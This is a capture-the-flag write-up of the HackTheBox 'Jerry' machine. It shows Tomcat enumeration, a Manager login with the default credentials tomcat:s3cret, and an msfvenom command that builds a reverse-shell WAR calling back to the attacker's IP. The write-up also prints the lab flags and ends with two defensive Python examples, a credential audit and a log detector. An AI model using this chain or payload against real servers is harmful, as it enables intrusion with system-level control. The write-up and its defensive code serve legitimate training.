# Jerry

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FVcXrP5t86vVT0w60eFRU%2F59f03a24178dbb2bdc94968c201e21f8.png?alt=media&#x26;token=60b8c9c5-89f4-46bd-ae1d-076a3e2f6cc5" alt=""><figcaption></figcaption></figure>

## Enumeration:

### Port Scanning:

#### Nmap:

```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.136.9            
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 12:46 +03
Nmap scan report for 10.129.136.9
Host is up, received echo-reply ttl 127 (0.14s latency).
Scanned at 2025-09-18 12:46:24 +03 for 139s
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON          VERSION
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
```

The only open port is 8080, which is running Apache Tomcat.

Open it with `Firefox`:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FmzsxaXLL1FUW4A2R6xjo%2Fimage.png?alt=media&#x26;token=679372e9-8406-4d4a-ade0-e0aec4984f09" alt=""><figcaption></figcaption></figure>

The version is shown at the top of the page, and it is old, so we can find multiple exploits for it.

## Exploitation:

### Get a reverse shell:

I will click on Manager App:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FmVfLPVObJXijuTLdAqcy%2Fimage.png?alt=media&#x26;token=174e7611-bc7b-4368-8b79-6a83c6a0957b" alt=""><figcaption></figcaption></figure>

It will ask me for username and password:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FQE3BsrJmbG1VLG7PSYgl%2Fimage.png?alt=media&#x26;token=d5ec6937-7b71-40ed-8e7e-24a2811dfab3" alt=""><figcaption></figcaption></figure>

We can try multiple combinations of default credentials, like `admin:admin`.

We will get access denied, but the error page shows the default credentials `tomcat:s3cret`:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FgS5zhUv537ZU5FwYbg0C%2Fimage.png?alt=media&#x26;token=8fbcd047-d98a-49e7-8c79-dd78fea872ec" alt=""><figcaption></figcaption></figure>

Let's test them:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FlhAMra1JMgEUpQMkmyXa%2Fimage.png?alt=media&#x26;token=87d75a36-1448-49fd-bf0a-8efca69f26e6" alt=""><figcaption></figcaption></figure>

We successfully managed to authenticate.
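The login works because the example account shown on the 401 page was left in `conf/tomcat-users.xml`. The following audit is an added example, not part of the original writeup: it flags such accounts, using constructed sample XML and an assumed weak-pair list in which only `tomcat:s3cret` comes from this page.

```python
import xml.etree.ElementTree as ET

# Roles that allow deploying applications through the Manager app.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Pairs to reject. tomcat:s3cret is the pair from this page; the others are
# assumed common defaults added for illustration.
KNOWN_WEAK = {("tomcat", "s3cret"), ("admin", "admin"), ("tomcat", "tomcat")}
MIN_LENGTH = 12  # assumed minimum password length for deploy-capable accounts

# Constructed sample resembling conf/tomcat-users.xml on a host like this one.
SAMPLE = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="monitor" password="Xq7!long-random-value" roles="manager-status"/>
  <user username="admin" password="admin" roles="admin-gui"/>
</tomcat-users>"""

def audit_tomcat_users(xml_text):
    """Return (username, reason) findings for risky accounts."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        # Newer Tomcat versions put elements in an XML namespace; ignore it.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        can_deploy = bool(roles & DEPLOY_ROLES)
        if (name, password) in KNOWN_WEAK or password == name:
            reason = "default credentials"
            if can_deploy:
                reason += " with deploy rights"
            findings.append((name, reason))
        elif can_deploy and len(password) < MIN_LENGTH:
            findings.append((name, "short password on deploy-capable account"))
    return findings

if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE):
        print(f"{user}: {reason}")
```
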

We can now upload a JSP file or a WAR file and deploy it, but first we need to create the WAR file using `msfvenom`:

```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry]                                   
└─$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.16.16 LPORT=443 -f war -o shell.war                                                                                      
Payload size: 13030 bytes                  
Final size of war file: 13030 bytes                                                   
Saved as: shell.war
```

Scrolling down a bit, we will find "Select WAR file to upload":

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FG7zmT4hdryeoliyiGihb%2Fimage.png?alt=media&#x26;token=314d3303-4d5c-42b1-b925-ae6be9d48df4" alt=""><figcaption></figcaption></figure>

I will press browse, and upload the shell.war that I created:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FUIW0RXFV7sYnBlq2KeST%2Fimage.png?alt=media&#x26;token=d99444e3-dd7c-4099-9595-fbd321cdae16" alt=""><figcaption></figcaption></figure>

Click on deploy, and we will see it in the applications table:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FONbNGM1StsNgGio3N9lt%2Fimage.png?alt=media&#x26;token=ad88c5b3-ae0d-41fb-be63-786bbacebd07" alt=""><figcaption></figcaption></figure>

Start our `netcat` listener:

```bash
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry]                                   
└─$ rlwrap nc -nlvp 443                    
listening on [any] 443 ...
```

Then click on that shell in the applications table, or navigate to `IP:PORT/shell/`:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FatGdA04G1bfHSETRoH2N%2Fimage.png?alt=media&#x26;token=c99559f8-79e4-4628-af9f-0adb6f6d5f2c" alt=""><figcaption></figcaption></figure>

We will see a blank page, but when we go back to our listener:

```bash
connect to [10.10.16.16] from (UNKNOWN) [10.129.136.9] 49198                          
Microsoft Windows [Version 6.3.9600]       
(c) 2013 Microsoft Corporation. All rights reserved.                                  
                                           
C:\apache-tomcat-7.0.88>whoami
nt authority\system

C:\apache-tomcat-7.0.88>hostname
JERRY

C:\apache-tomcat-7.0.88>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::19c5:d18d:c40a:d5cd
   Link-local IPv6 Address . . . . . : fe80::19c5:d18d:c40a:d5cd%12
   IPv4 Address. . . . . . . . . . . : 10.129.136.9
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%12
                                       10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb
```

We can now get the flags:

```bash
C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
```
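From the defender's side, the steps above (failed Manager logins, a successful login, a WAR upload, then a request to the new context) are all visible in Tomcat's access log. The detector below is an added example, not part of the original writeup; it assumes the AccessLogValve `common` pattern, and the log lines and the list of known contexts are constructed.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# Manager endpoints that deploy an application (HTML upload form and text API).
DEPLOY = re.compile(r'^/manager/(html/upload|text/deploy)')
# Contexts expected on this server (assumed: a stock Tomcat install).
KNOWN_CONTEXTS = ("", "docs", "examples", "manager", "host-manager")

# Constructed access-log lines modelled on the steps in this writeup.
SAMPLE_LOG = """\
10.10.16.16 - - [18/Sep/2025:12:50:01 +0300] "GET /manager/html HTTP/1.1" 401 2536
10.10.16.16 - - [18/Sep/2025:12:50:09 +0300] "GET /manager/html HTTP/1.1" 401 2536
10.10.16.16 - tomcat [18/Sep/2025:12:50:30 +0300] "GET /manager/html HTTP/1.1" 200 17812
10.10.16.16 - tomcat [18/Sep/2025:12:52:11 +0300] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=EXAMPLE HTTP/1.1" 200 19034
10.10.16.16 - - [18/Sep/2025:12:52:40 +0300] "GET /shell/ HTTP/1.1" 200 -
192.0.2.7 - - [18/Sep/2025:12:53:02 +0300] "GET /docs/ HTTP/1.1" 200 19367
"""

def detect_manager_abuse(log_text, known_contexts=KNOWN_CONTEXTS):
    """Return ordered (client, event) alerts for the login -> deploy -> trigger chain."""
    alerts, failures, deployed = [], defaultdict(int), set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, user, method, path, status = m.groups()
        # First path segment is the web application context.
        context = path.lstrip("/").split("/", 1)[0].split("?", 1)[0]
        if path.startswith("/manager/"):
            if status == "401":
                failures[client] += 1
            elif user != "-" and failures[client]:
                alerts.append((client, f"manager login as '{user}' after {failures[client]} failures"))
                failures[client] = 0
            if DEPLOY.match(path) and status == "200":
                alerts.append((client, f"application deployed via {method} {path.split('?')[0]}"))
                deployed.add(client)
        elif client in deployed and context not in known_contexts:
            alerts.append((client, f"request to unrecognised context '/{context}' after deploy"))
    return alerts

if __name__ == "__main__":
    for client, event in detect_manager_abuse(SAMPLE_LOG):
        print(client, event)
```

Restricting the Manager app to trusted source addresses and running Tomcat under a low-privileged service account rather than `nt authority\system` limits the impact of the same chain.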
